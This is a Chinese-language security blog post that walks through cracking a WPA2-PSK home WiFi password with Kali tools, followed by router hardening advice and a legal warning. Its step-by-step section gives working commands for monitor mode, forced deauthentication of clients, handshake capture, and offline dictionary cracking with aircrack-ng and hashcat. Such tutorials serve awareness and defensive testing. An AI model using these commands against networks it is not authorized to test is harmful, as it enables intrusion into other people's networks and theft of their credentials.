返回首页

你的WiFi真的安全吗?

2026-07-30 06:40 · 网络安全
 
 
root@kali:~# 安 全 攻 防

你的WiFi真的安全吗?
一把树莓派 + 一张网卡,五分钟拿下你家路由器密码

大多数人设置WiFi的流程是:运营商装宽带 → 师傅贴上默认密码 → 从此再没改过。在安全从业者眼里,这等于家门上用透明胶带贴了一把钥匙。

$ airmon-ng start wlan0 # 网卡已进入上帝视角
$ echo $TARGET # 每一个用生日做WiFi密码的人
$ cat /etc/motd # 本文不教攻击,教你怎么堵自家的门
_
 

[01] 为什么WiFi比你想象的脆弱

大多数人设置WiFi的流程是:运营商装宽带 → 师傅贴上默认密码 → 从此再没改过。在安全从业者眼里,这等于家门上用透明胶带贴了一把钥匙。

本文不教攻击,而是换个视角:如果攻击者盯上你的网络,他们用哪些工具、走哪些步骤、为什么防不住。

Kali Linux 是 Offensive Security 维护的渗透测试发行版,预装 600+ 安全工具。本文聚焦其中无线安全(Wireless Security)工具链,以 WPA/WPA2 个人版(PSK)网络为目标,走一遍完整的攻击链路。

▸ 先说结论:WPA2协议本身并不弱,弱的是人。大多数家用路由器的密码是8位纯数字、手机号、或"admin123456"。这种密码在字典攻击面前撑不过30秒。

[02] 工具链:四件套

一次完整的 WPA2-PSK 渗透只需四件工具,都在 Kali 预装范围内:

┌─[root@kali]─[~/wireless]

└──╼ # WPA2-PSK 四件套

airmon-ng → 网卡监听模式切换

airodump-ng → 无线流量抓包、目标发现

aireplay-ng → 断连攻击(Deauth),强制重连

aircrack-ng → 离线字典破解

此外,hashcat 可作为 GPU 加速替代,适合大规模字典攻击;reaver/wifite 是自动化 WPS PIN 攻击工具,针对仍开启 WPS 的老旧路由器一击必杀。

💡 硬件要求:一块支持 monitor mode + packet injection 的 USB 无线网卡。推荐芯片:Ralink RT3070 / Atheros AR9271。笔记本内置网卡通常不支持注入,得外接。

工具之间是管道关系:airmon-ng 切换模式 → airodump-ng 找到目标并抓包 → aireplay-ng 发送 Deauth 加速握手 → aircrack-ng 离线跑字典。熟练后五分钟内走完全流程。

[03] 实操演示

以下实验在与目标网络合法授权的前提下进行。演示环境:Kali 2024.1 × USB 无线网卡 × TP-Link 测试路由器。

Step 1 — 确认网卡,开启监听模式

sudo airmon-ng
# 输出示例:phy0 wlan0 rt2800usb [interface]
sudo airmon-ng start wlan0
# wlan0 → wlan0mon,网卡进入 Monitor Mode

monitor mode 是网卡的「上帝视角」:正常模式下网卡只收发给自己的包,monitor 模式下它能听到该信道上所有设备的通信。这是无线渗透的前提。

Step 2 — 扫描周边 WiFi,锁定目标

sudo airodump-ng wlan0mon

BSSID             PWR Beacons #Data CH ENC    ESSID
AA:BB:CC:DD:EE:01 -32 1834 4212  6 WPA2  TP-LINK_Test
AA:BB:CC:DD:EE:02 -68  327  14  11 WPA2  CMCC-5G8A

选定信号最强、有客户端活跃的目标,记录其 BSSID信道号。PWR 越接近 0 信号越强,#Data 越高说明活跃度越高。

Step 3 — 定向抓包,等待 WPA 四次握手

sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:01 -w capture wlan0mon
# -c 6:锁定信道 6,减少跳频开销
# --bssid:只抓目标 AP,排除噪音

此时终端顶部显示目标 AP 详情,底部列出已连接的客户端。如果已有客户端在线,理论上等到它自然重连就能抓到握手包——但可能等几分钟甚至几小时。强制触发就是下一步。

Step 4 — Deauth 攻击,强制客户端重连

sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:01 -c 11:22:33:44:55:66 wlan0mon
# -0 10:发送 10 个 Deauthentication 帧
# -a:目标 AP 的 BSSID
# -c:目标客户端 MAC

Deauth 帧是 802.11 管理帧,设计初衷是让 AP 通知客户端「你已被断开」。协议设计上没有对管理帧做加密或认证——攻击者可以伪造 AP 的 MAC 地址向客户端发送 Deauth。客户端收到后断开连接、自动重连,重连过程产生的 WPA 四次握手包就会被 airodump-ng 捕获。

▸ 关键结论:airodump-ng 界面右上角出现「WPA handshake: AA:BB:CC:DD:EE:01」即表示成功。从 Deauth 发送到握手捕获,通常不超过10秒。这就是 WiFi 协议层最经典的设计缺陷——管理帧不加密,至今无解(802.11w PMF 可以缓解,但普及率极低)。

Step 5 — 离线破解,跑字典匹配密码

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# -w:指定字典文件。rockyou.txt 含 1400 万条常见密码
# 匹配成功输出:KEY FOUND! [ password123 ]

rockyou.txt 是 2009 年 RockYou 网站泄露的 3200 万明文密码去重版,至今仍是无线破解的标配字典。8 位纯数字密码,这个字典能在 3 秒内命中;姓名拼音+生日的组合,用 crunch/hashcat 生成针对性掩码字典也能在几分钟内破开。

# GPU 加速方案(推荐)
hcxpcapngtool -o hash.hc22000 capture-01.cap
hashcat -m 22000 -a 0 hash.hc22000 rockyou.txt
# hashcat 用 GPU 跑,速度是 CPU 的 50-200 倍

到这里,你已经拿到了 WiFi 密码。从插入网卡到看到「KEY FOUND!」,熟练操作不超过 5 分钟。这说明什么?不是你技术好,是对方的密码太弱——信息安全中最薄弱的永远是人。

[04] 防护建议

了解攻击面之后,防护方向非常清晰。以下措施从易到难排列,前三项零成本、今天就能做。

① 修改默认密码,长度 ≥ 12位

混用大小写字母+数字+特殊符号。不要用生日、手机号、姓名拼音。推荐密码管理器(Bitwarden/1Password)生成随机密码。

② 关闭 WPS(WiFi Protected Setup)

WPS PIN 是 8 位数字,第 8 位是校验位,实际熵只有 10^7。工具 reaver 可在 4-10 小时内暴力破解。大部分家用路由器默认开启,关掉它等于堵上一个门。

③ 定期查看路由器已连接设备列表

发现异常 MAC 地址立刻拉黑并修改密码。关闭 SSID 广播能提高攻击门槛——虽然隐藏 SSID 在扫描工具面前只是多一行「Unknown」,但至少过滤非定向攻击。

④ 升级到 WPA3 或启用 WPA2-PMF

WPA3 引入 SAE 握手,彻底杜绝离线字典攻击——「抓到握手包也没用」。开启 PMF 能防御 Deauth 攻击。2020 年后出厂的大部分设备已支持。

⑤ 企业/办公场景部署 802.1X + RADIUS 认证

用证书替代预共享密钥,每个人独立账号,离职即吊销。配合 NAC 做设备合规检查,未打补丁的设备连不进内网。

⚡ [ WARNING ] 法律声明

用本文方法攻击他人 WiFi 属于违法行为,《刑法》第 285 条非法侵入计算机信息系统罪量刑可至七年。信息安全从业者的底线是:未经授权,绝不碰任何不属于自己的系统和网络。

> _ <

[05] 工具速查 & 延伸阅读

┌─[root@kali]─[~/tools]

└──╼ # 工具速查

Aircrack-ng  → https://www.aircrack-ng.org/documentation.html

Hashcat      → https://hashcat.net/hashcat/

Wifite        → https://github.com/derv82/wifite2

Bettercap     → https://www.bettercap.org/

OWASP Wireless → https://owasp.org/www-project-wireless-security-testing-guide/

WPA3 白皮书   → https://www.wi-fi.org/discover-wi-fi/security


以上。

工具无罪。但握工具的手,必须知道边界在哪。

</> EOF </>

$ read -p "你的WiFi密码改了吗?" update

点赞 · 在看 · 转发

DISCLAIMER
本文所有技术内容仅供安全研究与授权测试参考。
未授权渗透测试属于违法行为。

CYLOG

安全攻防 · 看得见的手

#网络安全 #技术 #kali #root

文章目录
    ×

    如果觉得文章对您有用,请随意打赏。
    您的支持是我们继续创作的动力!

    微信打赏

    微信扫一扫

    支付宝打赏

    支付宝扫一扫

    发表评论

    请先 登录 再评论